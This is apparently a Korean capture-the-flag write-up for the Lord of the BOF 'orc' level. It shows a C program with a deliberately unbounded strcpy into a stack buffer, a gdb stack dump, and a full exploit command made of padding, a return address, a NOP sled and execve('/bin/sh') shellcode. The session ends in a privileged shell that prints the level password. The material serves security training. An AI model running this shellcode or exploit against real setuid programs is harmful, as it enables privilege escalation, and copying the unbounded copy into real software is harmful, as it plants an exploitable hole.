BOF 원정대 – Level 4 (orc)

문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ; /* process environment; main() zeroes every entry in place */

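/*
 * Entry point of the level binary. argv[1] is the only input.
 *
 * Flow: reject when no argument is given; zero every environment string in
 * place ("egghunter"); reject unless byte 47 of argv[1] is 0xbf; then copy
 * argv[1] into a 40-byte stack buffer with an unbounded strcpy() and print
 * it. That strcpy() is the overflow this level is built around and is kept
 * exactly as in the challenge source; a bounded copy (e.g. snprintf() with
 * sizeof buffer) would close it.
 *
 * Arguments: argc, argv - standard; argv[1] is copied into buffer.
 * Returns:   0 after printing buffer. Both rejection paths call exit(0),
 *            i.e. they also report success to the caller.
 */
int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }

    /* egghunter: overwrite each environment string with zeros in place, so
     * nothing staged in the environment survives to the copy below. */
    for (i = 0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    /* Byte 47 of argv[1] must be 0xbf. There is no length check first: an
     * argv[1] shorter than 48 bytes makes this read past its terminator. */
    if (argv[1][47] != '\xbf') {
        printf("stack is still your friend.\n");
        exit(0);
    }

    /* Unbounded copy of argv[1] into buffer[40]: the overflow. */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    return 0;
}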

환경변수를 다 지우게 되므로 환경변수를 이용할 수 없다. 하지만 argv에 인자로 쉘코드를 넣어줄 수 있으므로 argv를 이용하면 된다.

[goblin@localhost goblin]$ gdb orc_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r `python -c print 'A'*44 + 'BBBB' + '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'` 
Starting program: /home/goblin/orc_tmp `python -c print 'A'*44 + 'BBBB' + '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'`

Breakpoint 1, 0x8048506 in main ()
(gdb) x/32wx $esp
0xbffe743c: 0x40021ca0 0xbffe7468 0x4000a970 0x400f855b
0xbffe744c: 0x08049680 0x4000ae60 0xbffe74b4 0xbffe7468
0xbffe745c: 0x080484eb 0x0804966c 0x08049680 0xbffe7488
0xbffe746c: 0x400309cb 0x00000002 0xbffe74b4 0xbffe74c0
0xbffe747c: 0x40013868 0x00000002 0x08048450 0x00000000
0xbffe748c: 0x08048471 0x08048500 0x00000002 0xbffe74b4
0xbffe749c: 0x08048390 0x0804860c 0x4000ae60 0xbffe74ac
0xbffe74ac: 0x40013e90 0x00000002 0xbffe759c 0xbffe75b1
(gdb) 
0xbffe74bc: 0x00000000 0xbffffcab 0xbffffccd 0xbffffcd7
0xbffe74cc: 0xbffffce5 0xbffffd04 0xbffffd13 0xbffffd2c
0xbffe74dc: 0xbffffd48 0xbffffd53 0xbffffd61 0xbffffda3
0xbffe74ec: 0xbffffdb5 0xbffffdca 0xbffffdda 0xbffffde6
0xbffe74fc: 0xbffffe04 0xbffffe0f 0xbffffe1c 0xbffffe24
0xbffe750c: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffe751c: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffe752c: 0x00001000 0x00000007 0x40000000 0x00000008
(gdb) 
0xbffe753c: 0x00000000 0x00000009 0x08048450 0x0000000b
0xbffe754c: 0x000001f7 0x0000000c 0x000001f7 0x0000000d
0xbffe755c: 0x000001f7 0x0000000e 0x000001f7 0x00000010
0xbffe756c: 0x0febfbff 0x0000000f 0xbffe7597 0x00000000
0xbffe757c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe758c: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffe759c: 0x6d6f682f 0x6f672f65 0x6e696c62 0x63726f2f
0xbffe75ac: 0x706d745f 0x41414100 0x41414141 0x41414141
(gdb) 
0xbffe75bc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe75cc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe75dc: 0x42424241 0x90909042 0x90909090 0x90909090
0xbffe75ec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe75fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe760c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe761c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe762c: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) q
The program is running. Exit anyway? (y or n) y
[goblin@localhost goblin]$ ./orc `python -c print 'A'*44 + '\x1c\x76\xfe\xbf' + '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'` 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv1h//shh/bin

 bash$ id
uid=504(orc) gid=503(goblin) egid=504(orc) groups=503(goblin)
bash$ my-pass
euid = 504
cantata
bash$ 
